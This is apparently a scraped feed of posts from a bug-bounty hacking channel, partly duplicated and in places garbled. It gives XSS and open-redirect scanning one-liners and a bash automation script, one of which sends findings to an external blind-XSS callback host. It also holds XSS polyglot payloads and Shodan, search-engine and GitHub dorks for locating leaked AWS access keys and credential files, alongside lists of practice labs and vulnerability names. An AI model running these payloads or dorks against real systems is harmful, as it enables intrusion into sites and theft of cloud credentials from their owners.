Simple Reflected XSS
1. subfinder -d target .com | httprobe -c 100 > target.txt
2. cat target.txt | waybackurls | gf xss | kxxs
🥰7🔥3
Brut Security
Simple Reflected XSS 1. subfinder -d target .com | httprobe -c 100 > target.txt 2. cat target.txt | waybackurls | gf xss | kxxs
For Automation Reflected XSS Scanning
#!/bin/bash
# Prompt user for domain input
read -p "Enter the domain you want to scan: " domain
# Define output file
output_file="scan_output.txt"
# Run subfinder to find subdomains, filter through httprobe, and save to target.txt
echo "Finding subdomains for $domain..."
subfinder -d $domain | httprobe -c 100 > target.txt
# Use waybackurls to find URLs from Wayback Machine, filter through gf for XSS, and scan with kxxs
echo "Scanning for XSS vulnerabilities..."
cat target.txt | waybackurls | gf xss | kxxs >> "$output_file"
# Display output file location
echo "Scan output saved to $output_file"
🔥6❤2
🚨Toxicache🚨
👉Golang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
🔗https://lnkd.in/gdtpJGmT
👉Golang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
🔗https://lnkd.in/gdtpJGmT
⚡5❤3🔥2👍1🌭1
Awesome Bug Bounty One-liners
A collection of awesome one-liner noscripts especially for bug bounty.
Open-redirect
Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0. .1:8080 -sk > /dev/null
XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
📚 Repositories:
1. https://lnkd.in/dMBdxSQD
2. https://lnkd.in/ebTrAP8y
3. https://lnkd.in/dmG4G3ea
4. https://lnkd.in/dXxHMUu9
A collection of awesome one-liner noscripts especially for bug bounty.
Open-redirect
Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0. .1:8080 -sk > /dev/null
XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
📚 Repositories:
1. https://lnkd.in/dMBdxSQD
2. https://lnkd.in/ebTrAP8y
3. https://lnkd.in/dmG4G3ea
4. https://lnkd.in/dXxHMUu9
👍10🔥5
Useful XSS payloads:
"/*\"/*`/*' /*</template> </textarea></noembed></nonoscript></noscript> </style></noscript>--><noscript onload=/*<html/*/onmouseover=alert()//>
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTIGJ5IFZpY2tpZScpPC9zY3JpcHQ+"
data:text/html,<noscript>alert(1)</noscript>
<select><noembed></select><noscript x='a@b'a>
❤11👍4👎1🔥1
Cyber Security Lab Practice, RED & BLUE Team.
🌀Attack-Defense - https://attackdefense.com
🌀Alert to win - https://aalf.nu/alert1
🌀Bancocn - https://bancocn.com
🌀Buffer Overflow Labs - https://lnkd.in/eNbEWYh
🌀CTF Komodo Security - https://ctf.komodosec.com
🌀CryptoHack - https://cryptohack.org/
🌀CMD Challenge - https://cmdchallenge.com
🌀Explotation Education - https://exploit.education
🌀Google CTF - https://lnkd.in/e46drbz8
🌀HackTheBox - Dr. AITH - https://www.hackthebox.com
🌀Hackthis - https://www.hackthis.co.uk
🌀Hacksplaining - https://lnkd.in/eAB5CSTA
🌀Hacker101 - https://ctf.hacker101.com
🌀Capture The Flag - Hacker Security - https://lnkd.in/ex7R-C-e
🌀Hacking-Lab - https://hacking-lab.com/
🌀ImmersiveLabs - https://immersivelabs.com
🌀NewbieContest - https://lnkd.in/ewBk6fU5
🌀OverTheWire - http://overthewire.org
🌀Practical Pentest Labs - https://lnkd.in/esq9Yuv5
🌀Pentestlab - https://pentesterlab.com
🌀Penetration Testing Practice Labs - https://lnkd.in/e6wVANYd
🌀PentestIT LAB - https://lab.pentestit.ru
🌀PicoCTF - https://picoctf.com
🌀PWNABLE - https://lnkd.in/eMEwBJzn
🌀Root-Me - https://www.root-me.org
🌀Root in Jail - http://rootinjail.com
🌀SANS Challenger - https://lnkd.in/e5TAMawK
🌀SmashTheStack - https://lnkd.in/eVn9rP9p
🌀The Cryptopals Crypto Challenges - https://cryptopals.com
🌀Try Hack Me - https://tryhackme.com
🌀Vulnhub - https://www.vulnhub.com
🌀Vulnmachine - https://lnkd.in/eJ2e_kD
🌀W3Challs - https://w3challs.com
🌀WeChall - http://www.wechall.net
🌀Websploit - https://websploit.org/
🌀Zenk-Security - https://lnkd.in/ewJ5rNx2
🌀Cyberdefenders - https://lnkd.in/dVcmjEw8
🌀LetsDefend- https://letsdefend.io/
🌀Attack-Defense - https://attackdefense.com
🌀Alert to win - https://aalf.nu/alert1
🌀Bancocn - https://bancocn.com
🌀Buffer Overflow Labs - https://lnkd.in/eNbEWYh
🌀CTF Komodo Security - https://ctf.komodosec.com
🌀CryptoHack - https://cryptohack.org/
🌀CMD Challenge - https://cmdchallenge.com
🌀Explotation Education - https://exploit.education
🌀Google CTF - https://lnkd.in/e46drbz8
🌀HackTheBox - Dr. AITH - https://www.hackthebox.com
🌀Hackthis - https://www.hackthis.co.uk
🌀Hacksplaining - https://lnkd.in/eAB5CSTA
🌀Hacker101 - https://ctf.hacker101.com
🌀Capture The Flag - Hacker Security - https://lnkd.in/ex7R-C-e
🌀Hacking-Lab - https://hacking-lab.com/
🌀ImmersiveLabs - https://immersivelabs.com
🌀NewbieContest - https://lnkd.in/ewBk6fU5
🌀OverTheWire - http://overthewire.org
🌀Practical Pentest Labs - https://lnkd.in/esq9Yuv5
🌀Pentestlab - https://pentesterlab.com
🌀Penetration Testing Practice Labs - https://lnkd.in/e6wVANYd
🌀PentestIT LAB - https://lab.pentestit.ru
🌀PicoCTF - https://picoctf.com
🌀PWNABLE - https://lnkd.in/eMEwBJzn
🌀Root-Me - https://www.root-me.org
🌀Root in Jail - http://rootinjail.com
🌀SANS Challenger - https://lnkd.in/e5TAMawK
🌀SmashTheStack - https://lnkd.in/eVn9rP9p
🌀The Cryptopals Crypto Challenges - https://cryptopals.com
🌀Try Hack Me - https://tryhackme.com
🌀Vulnhub - https://www.vulnhub.com
🌀Vulnmachine - https://lnkd.in/eJ2e_kD
🌀W3Challs - https://w3challs.com
🌀WeChall - http://www.wechall.net
🌀Websploit - https://websploit.org/
🌀Zenk-Security - https://lnkd.in/ewJ5rNx2
🌀Cyberdefenders - https://lnkd.in/dVcmjEw8
🌀LetsDefend- https://letsdefend.io/
Bancocn
Banco da Coreia do Norte
O Banco da Coreia do Norte é um laboratório virtual de hacking e pentest da Solyd Offensive Security. Teste suas habilidades e tente invadir este site!
❤8👍2🔥1
AWS OSINT by Dorking
=Shodan Dorks
html:"AWS_ACCESS_KEY_ID"
html:"AWS_SECRET_ACCESS_KEY"
html:"AWS_SESSION_TOKEN"
noscript:"AWS S3 Explorer"
html:"AWS Elastic Beanstalk overview"
html:"OpenSearch Dashboards"
"X-Amz-Server-Side-Encryption"
noscript:"EC2 Instance Information"
http.noscript:"Amazon Cognito Developer Authentication Sample"
"Server: EC2ws"
noscript:"AWS X-Ray Sample Application"
html:"Amazon EC2 Status"
html:"AWS EC2 Auto Scaling Lab"
html:"istBucketResult"
=Search Engine Dorks
site:.s3.amazonaws.com "Company"
site:http://s3.amazonaws.com innoscript:index.of.bucket “”
site:s3.amazonaws.com "index of /" s3
site:amazonaws.com filetype:xls password
inurl:gitlab "AWS_SECRET_KEY"
inurl:pastebin "AWS_ACCESS_KEY"
inurl:s3.amazonaws.com innoscript:"AWS S3 Explorer"
=Github Dorks
Key:amazon_secret_access_key
amazonaws
aws_access
aws_access_key_id
aws_bucket aws_key
aws_secret
aws_secret_key
aws_token
bucket_password
bucketeer_aws_access_key_id
bucketeer_aws_secret_access_key
cache_s3_secret_key
cloud_watch_aws_access_key
filename:credentials
aws_access_key_id
filename:s3cfg
lottie_s3_api_key
lottie_s3_secret_key
rds.amazonaws.com password
s3_access_key
s3_access_key_id
s3_key s3_key_app_logs
s3_key_assets
s3_secret_key
sandbox_aws_access_key_id
sandbox_aws_secret_access_key
secret_key
eureka.aws
secretkey
filename:.bash_profile
aws
filename:.s3cfg
=Shodan Dorks
html:"AWS_ACCESS_KEY_ID"
html:"AWS_SECRET_ACCESS_KEY"
html:"AWS_SESSION_TOKEN"
noscript:"AWS S3 Explorer"
html:"AWS Elastic Beanstalk overview"
html:"OpenSearch Dashboards"
"X-Amz-Server-Side-Encryption"
noscript:"EC2 Instance Information"
http.noscript:"Amazon Cognito Developer Authentication Sample"
"Server: EC2ws"
noscript:"AWS X-Ray Sample Application"
html:"Amazon EC2 Status"
html:"AWS EC2 Auto Scaling Lab"
html:"istBucketResult"
=Search Engine Dorks
site:.s3.amazonaws.com "Company"
site:http://s3.amazonaws.com innoscript:index.of.bucket “”
site:s3.amazonaws.com "index of /" s3
site:amazonaws.com filetype:xls password
inurl:gitlab "AWS_SECRET_KEY"
inurl:pastebin "AWS_ACCESS_KEY"
inurl:s3.amazonaws.com innoscript:"AWS S3 Explorer"
=Github Dorks
Key:amazon_secret_access_key
amazonaws
aws_access
aws_access_key_id
aws_bucket aws_key
aws_secret
aws_secret_key
aws_token
bucket_password
bucketeer_aws_access_key_id
bucketeer_aws_secret_access_key
cache_s3_secret_key
cloud_watch_aws_access_key
filename:credentials
aws_access_key_id
filename:s3cfg
lottie_s3_api_key
lottie_s3_secret_key
rds.amazonaws.com password
s3_access_key
s3_access_key_id
s3_key s3_key_app_logs
s3_key_assets
s3_secret_key
sandbox_aws_access_key_id
sandbox_aws_secret_access_key
secret_key
eureka.aws
secretkey
filename:.bash_profile
aws
filename:.s3cfg
🔥7👍3
🖥 100 Web Vulnerabilities, categorized into various types : 😀
⚡ Injection Vulnerabilities:
1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath Injection
9. HTML Injection
10. Server-Side Includes (SSI) Injection
11. OS Command Injection
12. Blind SQL Injection
13. Server-Side Template Injection (SSTI)
⚡ Broken Authentication and Session Management:
14. Session Fixation
15. Brute Force Attack
16. Session Hijacking
17. Password Cracking
18. Weak Password Storage
19. Insecure Authentication
20. Cookie Theft
21. Credential Reuse
⚡ Sensitive Data Exposure:
22. Inadequate Encryption
23. Insecure Direct Object References (IDOR)
24. Data Leakage
25. Unencrypted Data Storage
26. Missing Security Headers
27. Insecure File Handling
⚡ Security Misconfiguration:
28. Default Passwords
29. Directory Listing
30. Unprotected API Endpoints
31. Open Ports and Services
32. Improper Access Controls
33. Information Disclosure
34. Unpatched Software
35. Misconfigured CORS
36. HTTP Security Headers Misconfiguration
⚡ XML-Related Vulnerabilities:
37. XML External Entity (XXE) Injection
38. XML Entity Expansion (XEE)
39. XML Bomb
⚡ Broken Access Control:
40. Inadequate Authorization
41. Privilege Escalation
42. Insecure Direct Object References
43. Forceful Browsing
44. Missing Function-Level Access Control
⚡ Insecure Deserialization:
45. Remote Code Execution via Deserialization
46. Data Tampering
47. Object Injection
⚡ API Security Issues:
48. Insecure API Endpoints
49. API Key Exposure
50. Lack of Rate Limiting
51. Inadequate Input Validation
⚡ Insecure Communication:
52. Man-in-the-Middle (MITM) Attack
53. Insufficient Transport Layer Security
54. Insecure SSL/TLS Configuration
55. Insecure Communication Protocols
⚡ Client-Side Vulnerabilities:
56. DOM-based XSS
57. Insecure Cross-Origin Communication
58. Browser Cache Poisoning
59. Clickjacking
60. HTML5 Security Issues
⚡ Denial of Service (DoS):
61. Distributed Denial of Service (DDoS)
62. Application Layer DoS
63. Resource Exhaustion
64. Slowloris Attack
65. XML Denial of Service
⚡ Other Web Vulnerabilities:
66. Server-Side Request Forgery (SSRF)
67. HTTP Parameter Pollution (HPP)
68. Insecure Redirects and Forwards
69. File Inclusion Vulnerabilities
70. Security Header Bypass
71. Clickjacking
72. Inadequate Session Timeout
73. Insufficient Logging and Monitoring
74. Business Logic Vulnerabilities
75. API Abuse
⚡ Mobile Web Vulnerabilities:
76. Insecure Data Storage on Mobile Devices
77. Insecure Data Transmission on Mobile Devices
78. Insecure Mobile API Endpoints
79. Mobile App Reverse Engineering
⚡ IoT Web Vulnerabilities:
80. Insecure IoT Device Management
81. Weak Authentication on IoT Devices
82. IoT Device Vulnerabilities
⚡ Web of Things (WoT) Vulnerabilities:
83. Unauthorized Access to Smart Homes
84. IoT Data Privacy Issues
⚡ Authentication Bypass:
85. Insecure "Remember Me" Functionality
86. CAPTCHA Bypass
⚡ Server-Side Request Forgery (SSRF):
87. Blind SSR
88. Time-Based Blind SSRF
⚡ Content Spoofing:
89. MIME Sniffing
90. X-Content-Type-Options Bypass
91. Content Security Policy (CSP) Bypass
⚡ Business Logic Flaws:
92. Inconsistent Validation
93. Race Conditions
94. Order Processing Vulnerabilities
95. Price Manipulation
96. Account Enumeration
97. User-Based Flaws
⚡ Zero-Day Vulnerabilities:
98. Unknown Vulnerabilities
99. Unpatched Vulnerabilities
100. Day-Zero Exploits
⚡ Injection Vulnerabilities:
1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath Injection
9. HTML Injection
10. Server-Side Includes (SSI) Injection
11. OS Command Injection
12. Blind SQL Injection
13. Server-Side Template Injection (SSTI)
⚡ Broken Authentication and Session Management:
14. Session Fixation
15. Brute Force Attack
16. Session Hijacking
17. Password Cracking
18. Weak Password Storage
19. Insecure Authentication
20. Cookie Theft
21. Credential Reuse
⚡ Sensitive Data Exposure:
22. Inadequate Encryption
23. Insecure Direct Object References (IDOR)
24. Data Leakage
25. Unencrypted Data Storage
26. Missing Security Headers
27. Insecure File Handling
⚡ Security Misconfiguration:
28. Default Passwords
29. Directory Listing
30. Unprotected API Endpoints
31. Open Ports and Services
32. Improper Access Controls
33. Information Disclosure
34. Unpatched Software
35. Misconfigured CORS
36. HTTP Security Headers Misconfiguration
⚡ XML-Related Vulnerabilities:
37. XML External Entity (XXE) Injection
38. XML Entity Expansion (XEE)
39. XML Bomb
⚡ Broken Access Control:
40. Inadequate Authorization
41. Privilege Escalation
42. Insecure Direct Object References
43. Forceful Browsing
44. Missing Function-Level Access Control
⚡ Insecure Deserialization:
45. Remote Code Execution via Deserialization
46. Data Tampering
47. Object Injection
⚡ API Security Issues:
48. Insecure API Endpoints
49. API Key Exposure
50. Lack of Rate Limiting
51. Inadequate Input Validation
⚡ Insecure Communication:
52. Man-in-the-Middle (MITM) Attack
53. Insufficient Transport Layer Security
54. Insecure SSL/TLS Configuration
55. Insecure Communication Protocols
⚡ Client-Side Vulnerabilities:
56. DOM-based XSS
57. Insecure Cross-Origin Communication
58. Browser Cache Poisoning
59. Clickjacking
60. HTML5 Security Issues
⚡ Denial of Service (DoS):
61. Distributed Denial of Service (DDoS)
62. Application Layer DoS
63. Resource Exhaustion
64. Slowloris Attack
65. XML Denial of Service
⚡ Other Web Vulnerabilities:
66. Server-Side Request Forgery (SSRF)
67. HTTP Parameter Pollution (HPP)
68. Insecure Redirects and Forwards
69. File Inclusion Vulnerabilities
70. Security Header Bypass
71. Clickjacking
72. Inadequate Session Timeout
73. Insufficient Logging and Monitoring
74. Business Logic Vulnerabilities
75. API Abuse
⚡ Mobile Web Vulnerabilities:
76. Insecure Data Storage on Mobile Devices
77. Insecure Data Transmission on Mobile Devices
78. Insecure Mobile API Endpoints
79. Mobile App Reverse Engineering
⚡ IoT Web Vulnerabilities:
80. Insecure IoT Device Management
81. Weak Authentication on IoT Devices
82. IoT Device Vulnerabilities
⚡ Web of Things (WoT) Vulnerabilities:
83. Unauthorized Access to Smart Homes
84. IoT Data Privacy Issues
⚡ Authentication Bypass:
85. Insecure "Remember Me" Functionality
86. CAPTCHA Bypass
⚡ Server-Side Request Forgery (SSRF):
87. Blind SSR
88. Time-Based Blind SSRF
⚡ Content Spoofing:
89. MIME Sniffing
90. X-Content-Type-Options Bypass
91. Content Security Policy (CSP) Bypass
⚡ Business Logic Flaws:
92. Inconsistent Validation
93. Race Conditions
94. Order Processing Vulnerabilities
95. Price Manipulation
96. Account Enumeration
97. User-Based Flaws
⚡ Zero-Day Vulnerabilities:
98. Unknown Vulnerabilities
99. Unpatched Vulnerabilities
100. Day-Zero Exploits
👍19❤🔥4❤2